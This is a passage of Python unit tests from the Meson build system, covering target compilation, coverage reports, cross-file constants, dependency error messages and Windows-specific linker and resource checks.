self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
# Check that we have a shared lib, but not an executable, i.e. check that target actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
# Target specified in a project with non-unique names
testdir = os.path.join(self.common_test_dir, '190 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# Explicitly clean the target through msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '75 dep files')
# Regression test: a spurious reconfigure was happening when the build
# directory was inside the source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During the first configure the file did not exist, so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but it is inside the build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
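# Validate the generated JUnit XML against the reference XSD shipped with the test data.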
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '213 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '44 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '232 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown_dynamic/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = set(k for k,v in md_command_sections.items())
help_output = self._run(self.meson_command + ['--help'])
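# Extract the command names from the '{cmd1,cmd2,...}' choices list in the --help usage text.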
help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))
self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))
## Validate that each section has proper placeholders
def get_data_pattern(command):
return re.compile(
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'usage\'\] }}[\r\n]'
r'^```[\r\n]'
r'.*?'
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'arguments\'\] }}[\r\n]'
r'^```',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))
def test_coverage(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '109 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
def test_cross_file_constants(self):
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
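# Constants defined in an earlier machine file (compiler) and within the same file (toolchain, common_flags) must both be resolvable.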
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '78 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
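# Turn the upstream directory into a git repository so the wrap can clone it.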
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
an error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test when ignore_libs changes, and also to test the current list
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
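# Resolve the linker override environment variable for this language from Meson's binary table.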
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
